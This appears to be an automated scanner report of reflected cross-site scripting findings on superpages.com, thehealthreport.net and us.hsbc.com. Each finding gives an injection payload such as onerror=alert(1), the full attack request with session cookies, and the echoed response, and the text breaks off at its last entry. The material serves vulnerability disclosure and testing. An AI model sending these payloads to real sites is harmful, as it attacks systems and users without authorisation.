HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750439498-www.superpages.com-4789827-628076; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:27:19 GMT; Path=/ Set-Cookie: JSESSIONID=8C15D1E521D5C7BAD68D0A53F9577955; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:27:18 GMT Content-Length: 128435
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a href="http://yellowpages.superpages.com/profiler/abook.jsp?requestAction=toBusinesses&SRC=comlocal1a8c3a4"style="x:expression(alert(1))"d28cbb2cb02" rel="nofollow" onClick="clickTrackTabs('GT','MySuperpages', 'yp_profile');"> ...[SNIP]...
The value of the TR request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 843a2"-alert(1)-"a8e7c8583e3 was submitted in the TR parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1843a2"-alert(1)-"a8e7c8583e3 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 500 Internal Server Error Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750623993-www.superpages.com-28426864-914831; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:30:23 GMT; Path=/ Set-Cookie: JSESSIONID=265FBF1301E359B78C423E3003AF80EE; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:30:23 GMT Connection: close Content-Length: 23380
<!-- --> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <title> Superpages.com ...[SNIP]... ype="two"; var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1843a2"-alert(1)-"a8e7c8583e3"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of the bidType request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5dd4"-alert(1)-"d9f9799ecf8 was submitted in the bidType parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIKb5dd4"-alert(1)-"d9f9799ecf8&TR=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750603809-www.superpages.com-9081164-800011; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:30:03 GMT; Path=/ Set-Cookie: JSESSIONID=219F120FEB2F8290C38E110E827DE695; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:30:03 GMT Content-Length: 66496
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <title>Ally Bank in Philad ...[SNIP]... archtype="two"; var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIKb5dd4"-alert(1)-"d9f9799ecf8&TR=1"; var client_id = "133515049997773"; var redirecturl = 'http://www.superpages.com/bp/Facebook?prev=yp_profile'; //--> ...[SNIP]...
The value of the lbp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f71cf"-alert(1)-"8b1ed61181f was submitted in the lbp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1f71cf"-alert(1)-"8b1ed61181f&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750510916-www.superpages.com-5233303-969715; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:28:30 GMT; Path=/ Set-Cookie: JSESSIONID=742BF78E1A6BFC3ABF53A5C98640882B; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:28:30 GMT Content-Length: 60956
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <title>Ally Bank - Handlin ...[SNIP]... = 'http://www.superpages.com'; var searchtype="two"; searchtype="two"; var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1f71cf"-alert(1)-"8b1ed61181f&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1"; var client_id = "133515049997773"; var redirecturl = 'http://www.superpages.com/bp/Facebook?prev=yp_profile'; //--> ...[SNIP]...
4.522. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7992e"-alert(1)-"47024e3844d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1&7992e"-alert(1)-"47024e3844d=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750649070-www.superpages.com-20879668-932317; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:30:49 GMT; Path=/ Set-Cookie: JSESSIONID=3B2D663DFEFD640AA8C05C35E7490265; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:30:48 GMT Content-Length: 23390
<!-- --> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <title> Superpages.com ...[SNIP]... pe="two"; var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1&7992e"-alert(1)-"47024e3844d=1"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f53dc"-alert(1)-"b9a871a93d9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/xmlproxyf53dc"-alert(1)-"b9a871a93d9?url=http%3A%2F%2Fugc-int.superpages.com%2Fugcwiki%2FGetPhotoServlet%3FlistingId%3D2118363360 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_cc=true; s_lastvisit=1296748870245; s_pv=Business%20Profile; s_dfa=superpagescom; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: web=; Domain=.superpages.com; Path=/ Set-Cookie: shopping=; Domain=.superpages.com; Path=/ Set-Cookie: yp=; Domain=.superpages.com; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:03:55 GMT Content-Length: 57628
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <script language="JavaScript" type="text/javascript"> document.cookie="OpenPhones="; </script> <h ...[SNIP]... ellowpages.superpages.com'; var var_account = 'Superpagescom'; var hostServ = 'http://www.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://www.superpages.com/bp/xmlproxyf53dc"-alert(1)-"b9a871a93d9?url=http%3A%2F%2Fugc-int.superpages.com%2Fugcwiki%2FGetPhotoServlet%3FlistingId%3D2118363360"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
4.524. http://www.superpages.com/coupons [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.superpages.com
Path:
/coupons
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3b22"-alert(1)-"6172bed7d5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /coupons?f3b22"-alert(1)-"6172bed7d5b=1 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: JSESSIONID=14A03C36B158EBE2AE84FEB1EA46C2E7; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 74692 Date: Thu, 03 Feb 2011 17:09:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="h ...[SNIP]... //yellowpages.superpages.com'; var var_account = 'Superpagescom'; var hostServ = 'http://www.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://www.superpages.com/coupons?f3b22"-alert(1)-"6172bed7d5b=1"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54e04"-alert(1)-"5dda26f052b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inc/social/54e04"-alert(1)-"5dda26f052b?n=5&t=Ally+Bank+in+Philadelphia%2C+PA+%7C+P+O+Box+13625%2C+Philadelphia%2C+PA&u=http://yellowpages.superpages.com%2Fbp%2FUS%2FAlly-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm%3FSRC%3Dcomlocal1a%26lbp%3D1%26PGID%3Ddalms102.8089.1296748577335.307646855%26bidType%3DCLIK%26TR%3D1&s=1 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
...[SNIP]... var hostServ = 'http://www.superpages.com'; var searchtype="two";
searchtype="one";
var actualUrl = "http://www.superpages.com/inc/social/54e04"-alert(1)-"5dda26f052b?n=5&t=Ally+Bank+in+Philadelphia%2C+PA+%7C+P+O+Box+13625%2C+Philadelphia%2C+PA&u=http://yellowpages.superpages.com%2Fbp%2FUS%2FAlly-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm%3FSRC%3Dcomloc ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4500c<img%20src%3da%20onerror%3dalert(1)>46b2d68491a was submitted in the REST URL parameter 2. This input was echoed as 4500c<img src=a onerror=alert(1)>46b2d68491a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /yellowpages/C-Banks4500c<img%20src%3da%20onerror%3dalert(1)>46b2d68491a HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 17:07:45 GMT Server: Unspecified Vary: Host Last-Modified: Thu, 03 Feb 2011 17:07:46GMT Content-Length: 58480 Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:46 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <META NAME="TITLE" CONTENT="Banks4500c<img Src=a Onerror=alert(1)>46b2d68491a in Y ...[SNIP]... <h1>Select a State to view Banks4500c<img Src=a Onerror=alert(1)>46b2d68491a Listings </h1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43ba5"><img%20src%3da%20onerror%3dalert(1)>935e0c29137 was submitted in the REST URL parameter 2. This input was echoed as 43ba5"><img src=a onerror=alert(1)>935e0c29137 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /yellowpages/C-Banks43ba5"><img%20src%3da%20onerror%3dalert(1)>935e0c29137 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 17:07:36 GMT Server: Unspecified Vary: Host Last-Modified: Thu, 03 Feb 2011 17:07:36GMT Content-Length: 59492 Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:36 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <META NAME="TITLE" CONTENT="Banks43ba5"><img Src=a Onerror=alert(1)>935e0c29137 in Yellow Pages by SuperPages"> ...[SNIP]...
4.528. http://www.superpages.com/yellowpages/C-Banks [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.superpages.com
Path: /yellowpages/C-Banks
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41c54"><img%20src%3da%20onerror%3dalert(1)>2bfa6c73542 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 41c54"><img src=a onerror=alert(1)>2bfa6c73542 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /yellowpages/C-Banks?41c54"><img%20src%3da%20onerror%3dalert(1)>2bfa6c73542=1 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 17:06:55 GMT Server: Unspecified Vary: Host Last-Modified: Thu, 03 Feb 2011 17:06:56GMT Content-Length: 60810 Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:21:56 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <META NAME="TITLE" CONTENT="Banks?41c54"><img Src=a Onerror=alert(1)>2bfa6c73542=1 in Yellow Pages by SuperPages"> ...[SNIP]...
4.529. http://www.superpages.com/yellowpages/C-Banks [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.superpages.com
Path: /yellowpages/C-Banks
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bf72b<img%20src%3da%20onerror%3dalert(1)>ee7e8ccc6d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf72b<img src=a onerror=alert(1)>ee7e8ccc6d1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /yellowpages/C-Banks?bf72b<img%20src%3da%20onerror%3dalert(1)>ee7e8ccc6d1=1 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 17:07:06 GMT Server: Unspecified Vary: Host Last-Modified: Thu, 03 Feb 2011 17:07:06GMT Content-Length: 59798 Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:06 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <META NAME="TITLE" CONTENT="Banks?bf72b<img Src=a Onerror=alert(1)>ee7e8ccc6d1=1 i ...[SNIP]... <h1>Select a State to view Banks?bf72b<img Src=a Onerror=alert(1)>ee7e8ccc6d1=1 Listings </h1> ...[SNIP]...
The value of the sub request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e765"><script>alert(1)</script>4ba170077e5 was submitted in the sub parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ac-usap.php?sub=xyp7e765"><script>alert(1)</script>4ba170077e5 HTTP/1.1 Host: www.thehealthreport.net Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.pp&pos=7&t=7&sz=310x101&ord=1296748883062&k=banks&l=Dallas%2c+TX Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"> <!-- saved from url=(0034)http://www.channel5healthnews.net/ --> <H ...[SNIP]... <A href="http://ziggymedia.go2cloud.org/aff_c?offer_id=6&aff_id=1001&source=xyp7e765"><script>alert(1)</script>4ba170077e5-dp" target=_blank> ...[SNIP]...
The value of the hp_pref request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74bf5"%3balert(1)//00c0d1ff9 was submitted in the hp_pref parameter. This input was echoed as 74bf5";alert(1)//00c0d1ff9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /1/2/3?command=makeThisMyHome&hp_pref=r74bf5"%3balert(1)//00c0d1ff9 HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:09:06 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:10:07 GMT Vary: User-Agent,Cookie Content-Length: 5895 Set-Cookie: USIB2G=00005EK9jF4bpOMzFrUSkh3Dd5x:14k1jbteq; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http-equiv="Content-Type" content=" ...[SNIP]... <script language="javascript"> var date = new Date(); date.setTime(date.getTime()+(365*24*60*60*1000)); var expires = "; expires="+date.toGMTString(); document.cookie = "hp_pref"+"="+"r74bf5";alert(1)//00c0d1ff9"+expires+"; path=/";
The value of the code request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afe63"style%3d"x%3aexpression(alert(1))"19a95eb25d7 was submitted in the code parameter. This input was echoed as afe63"style="x:expression(alert(1))"19a95eb25d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated closes the attribute value and injects a style attribute whose CSS expression() is dynamically evaluated, introducing arbitrary JavaScript into the document. Note that expression() is specific to Internet Explorer (and was dropped from IE8 standards mode onwards), so this particular payload does not fire in other browsers; the attribute injection itself is browser-independent, and the "><script> and "><img onerror> payloads used elsewhere in this report would work in the same position.
Request
GET /1/2/3/hsbcpremier/apply?code=MEP0002714afe63"style%3d"x%3aexpression(alert(1))"19a95eb25d7 HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
